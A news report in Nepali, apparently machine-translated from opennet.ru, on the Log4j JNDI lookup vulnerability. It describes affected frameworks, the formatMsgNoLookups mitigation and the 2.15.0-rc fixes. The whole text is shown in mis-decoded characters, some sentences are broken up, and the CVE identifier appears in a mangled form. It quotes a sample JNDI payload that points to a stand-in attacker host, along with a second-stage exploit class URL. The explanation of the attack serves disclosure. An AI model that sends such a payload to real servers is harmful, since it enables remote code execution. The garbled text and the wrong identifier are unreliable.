Apache Log4j рдорд╛, Java рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рд▓рдЧрд┐рдЩ рд╡реНрдпрд╡рд╕реНрдерд┐рдд рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐ рдПрдХ рд▓реЛрдХрдкреНрд░рд┐рдп рдврд╛рдБрдЪрд╛, рдПрдЙрдЯрд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЬреЛрдЦрд┐рдо рдкрд╣рд┐рдЪрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫ рдЬрд╕рд▓реЗ "{jndi:URL}" рдврд╛рдБрдЪрд╛рдорд╛ рд╡рд┐рд╢реЗрд╖ рд░реВрдкрдорд╛ рдврд╛рдБрдЪрд╛ рдЧрд░рд┐рдПрдХреЛ рдорд╛рди рд▓рдЧрдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдмреЗрд▓рд╛рдорд╛ рд╕реНрд╡реЗрдЪреНрдЫрд╛рдЪрд╛рд░реА рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдЖрдХреНрд░рдордг рдЬрд╛рднрд╛ рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫ рдЬреБрди рдмрд╛рд╣реНрдп рд╕реНрд░реЛрддрд╣рд░реВрдмрд╛рдЯ рдкреНрд░рд╛рдкреНрдд рдорд╛рдирд╣рд░реВ рд▓рдЧ рдЧрд░реНрджрдЫ, рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, рддреНрд░реБрдЯрд┐ рд╕рдиреНрджреЗрд╢рд╣рд░реВрдорд╛ рд╕рдорд╕реНрдпрд╛рдЧреНрд░рд╕реНрдд рдорд╛рдирд╣рд░реВ рдкреНрд░рджрд░реНрд╢рди рдЧрд░реНрджрд╛ред
рдпреЛ рдиреЛрдЯ рдЧрд░рд┐рдПрдХреЛ рдЫ рдХрд┐ Apache Struts, Apache Solr, Apache Druid рд╡рд╛ Apache Flink рдЬрд╕реНрддрд╛ рдлреНрд░реЗрдорд╡рд░реНрдХрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреЗ рд▓рдЧрднрдЧ рд╕рдмреИ рдкрд░рд┐рдпреЛрдЬрдирд╛рд╣рд░реВ рд╕реНрдЯреАрдо, Apple iCloud, Minecraft рдЧреНрд░рд╛рд╣рдХрд╣рд░реВ рд░ рд╕рд░реНрднрд░рд╣рд░реВ рд╕рд╣рд┐рдд рд╕рдорд╕реНрдпрд╛рдмрд╛рдЯ рдкреНрд░рднрд╛рд╡рд┐рдд рдЫрдиреНред рдпреЛ рдЖрд╢рд╛ рдЧрд░рд┐рдПрдХреЛ рдЫ рдХрд┐ рдХрдордЬреЛрд░реАрд▓реЗ рдХрд░реНрдкреЛрд░реЗрдЯ рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдареВрд▓реЛ рдЖрдХреНрд░рдордгрдХреЛ рд▓рд╣рд░ рдирд┐рдореНрддреНрдпрд╛рдЙрди рд╕рдХреНрдЫ, Apache Struts рдлреНрд░реЗрдорд╡рд░реНрдХрдорд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░реАрд╣рд░реВрдХреЛ рдЗрддрд┐рд╣рд╛рд╕ рджреЛрд╣реЛрд░реНрдпрд╛рдЙрдБрдЫ, рдЬреБрди, рдХреБрдиреИ рдирд░рд╛рдореНрд░реЛ рдЕрдиреБрдорд╛рди рдЕрдиреБрд╕рд╛рд░, Fortune рдХреЛ 65% рджреНрд╡рд╛рд░рд╛ рд╡реЗрдм рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫред 100 рдХрдореНрдкрдиреАрд╣рд░реВред рдХрдордЬреЛрд░ рдкреНрд░рдгрд╛рд▓реАрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рдиреЗрдЯрд╡рд░реНрдХ рд╕реНрдХреНрдпрд╛рди рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕рд╣рд░реВ рд╕рд╣рд┐рддред
рдХрд╛рд░реНрдп рд╢реЛрд╖рдг рдкрд╣рд┐рд▓реЗ рдиреИ рдкреНрд░рдХрд╛рд╢рд┐рдд рднрдЗрд╕рдХреЗрдХреЛ рдЫ, рддрд░ рд╕реНрдерд┐рд░ рд╢рд╛рдЦрд╛рд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рд╕рдорд╛рдзрд╛рдирд╣рд░реВ рдЕрдЭреИ рд╕рдореНрдо рдХрдореНрдкрд╛рдЗрд▓ рдЧрд░рд┐рдПрдХреЛ рдЫреИрди рднрдиреНрдиреЗ рддрдереНрдпрд▓реЗ рд╕рдорд╕реНрдпрд╛ рдмрдвреЗрдХреЛ рдЫред CVE рдкрд╣рд┐рдЪрд╛рдирдХрд░реНрддрд╛ рдЕрдЭреИ рдирд┐рдпреБрдХреНрдд рдЧрд░рд┐рдПрдХреЛ рдЫреИрдиред рдлрд┐рдХреНрд╕ рдорд╛рддреНрд░ log4j-2.15.0-rc1 рдкрд░реАрдХреНрд╖рдг рд╢рд╛рдЦрд╛ рдорд╛ рд╕рдорд╛рд╡реЗрд╢ рдЫред рднреЗрджреНрдпрддрд╛рд▓рд╛рдИ рд░реЛрдХреНрдирдХреЛ рд▓рд╛рдЧрд┐ рд╕рдорд╛рдзрд╛рдирдХреЛ рд░реВрдкрдорд╛, log4j2.formatMsgNoLookups рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд▓рд╛рдИ рд╕рддреНрдпрдорд╛ рд╕реЗрдЯ рдЧрд░реНрди рд╕рд┐рдлрд╛рд░рд┐рд╕ рдЧрд░рд┐рдиреНрдЫред
рдпреЛ рд╕рдорд╕реНрдпрд╛ log4j рдХреЛ рд▓рдЧ рд▓рд╛рдЗрдирд╣рд░реВрдорд╛ рд╡рд┐рд╢реЗрд╖ рдорд╛рд╕реНрдХ "{}" рдкреНрд░рд╢реЛрдзрди рдЧрд░реНрдиреЗ рд╕рдорд░реНрдердирдХреЛ рдХрд╛рд░рдгрд▓реЗ рднрдПрдХреЛ рд╣реЛ, рдЬреБрди JNDI (рдЬрд╛рднрд╛ рдирд╛рдордХрд░рдг рд░ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЗрдиреНрдЯрд░рдлреЗрд╕) рдкреНрд░рд╢реНрдирд╣рд░реВ рдкреНрд░рджрд░реНрд╢рди рдЧрд░реНрди рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫред рдЖрдХреНрд░рдордг "${jndi:ldap://attacker.com/a}" рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрдирдХреЛ рд╕рд╛рде рд╕реНрдЯреНрд░рд┐рдЩ рдкрд╛рд╕ рдЧрд░реНрдирдорд╛ рдЙрдмрд▓рд┐рдиреНрдЫ, рдЬреБрди, рдкреНрд░рд╢реЛрдзрди рдЧрд░реНрджрд╛, log4j рд▓реЗ рдкрдард╛рдЙрдиреЗрдЫред рд╕рд░реНрднрд░ рдЬрд╛рднрд╛ рдХреНрд▓рд╛рд╕ рдкрд╛рдердХреЛ рд▓рд╛рдЧрд┐ attacker.com LDAP рдХреНрд╡реЗрд░реАред рдлрд┐рд░реНрддрд╛ рдЧрд░рд┐рдпреЛред рд╕рд░реНрднрд░ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрдХреЛ рдорд╛рд░реНрдЧ (рдЬрд╕реНрддреИ http://second-stage.attacker.com/Exploit.class) рд╣рд╛рд▓рдХреЛ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдХреЛ рд╕рдиреНрджрд░реНрднрдорд╛ рд▓реЛрдб рд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░рд┐рдиреЗрдЫ, рдЬрд╕рд▓реЗ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓рд╛рдИ рд╣рд╛рд▓рдХреЛ рдЕрдиреБрдкреНрд░рдпреЛрдЧрдХреЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рдХреЛ рд╕рд╛рде рдкреНрд░рдгрд╛рд▓реАрдорд╛ рдордирдорд╛рдиреА рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреЗрдЫред
рдкрд░рд┐рд╢рд┐рд╖реНрдЯ рез: рднреЗрджреНрдпрддрд╛рд▓рд╛рдИ рдкрд╣рд┐рдЪрд╛рдирдХрд░реНрддрд╛ CVE-1-2021 рддреЛрдХрд┐рдПрдХреЛ рдЫред
рдкрд░рд┐рд╢рд┐рд╖реНрдЯ 2: рд░рд┐рд▓реАрдЬ log4j-2.15.0-rc1 рджреНрд╡рд╛рд░рд╛ рдердкрд┐рдПрдХреЛ рд╕реБрд░рдХреНрд╖рд╛рд▓рд╛рдИ рдмрд╛рдЗрдкрд╛рд╕ рдЧрд░реНрдиреЗ рддрд░рд┐рдХрд╛ рдкрд╣рд┐рдЪрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫред рдПрдЙрдЯрд╛ рдирдпрд╛рдБ рдЕрдкрдбреЗрдЯ, log4j-2.15.0-rc2, рдЬреЛрдЦрд┐рдо рд╡рд┐рд░реБрджреНрдз рдердк рдкреВрд░реНрдг рд╕реБрд░рдХреНрд╖рд╛рдХреЛ рд╕рд╛рде рдкреНрд░рд╕реНрддрд╛рд╡ рдЧрд░рд┐рдПрдХреЛ рдЫред рдХреЛрдбрд▓реЗ рдЧрд▓рдд рддрд░рд┐рдХрд╛рд▓реЗ рдврд╛рдБрдЪрд╛ рдЧрд░рд┐рдПрдХреЛ JNDI URL рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛ рдЕрд╕рд╛рдорд╛рдиреНрдп рд╕рдорд╛рдкреНрддрд┐рдХреЛ рдЕрдиреБрдкрд╕реНрдерд┐рддрд┐рд╕рдБрдЧ рд╕рдореНрдмрдиреНрдзрд┐рдд рдкрд░рд┐рд╡рд░реНрддрдирд▓рд╛рдИ рд╣рд╛рдЗрд▓рд╛рдЗрдЯ рдЧрд░реНрджрдЫред
рд╕реНрд░реЛрдд: opennet.ru
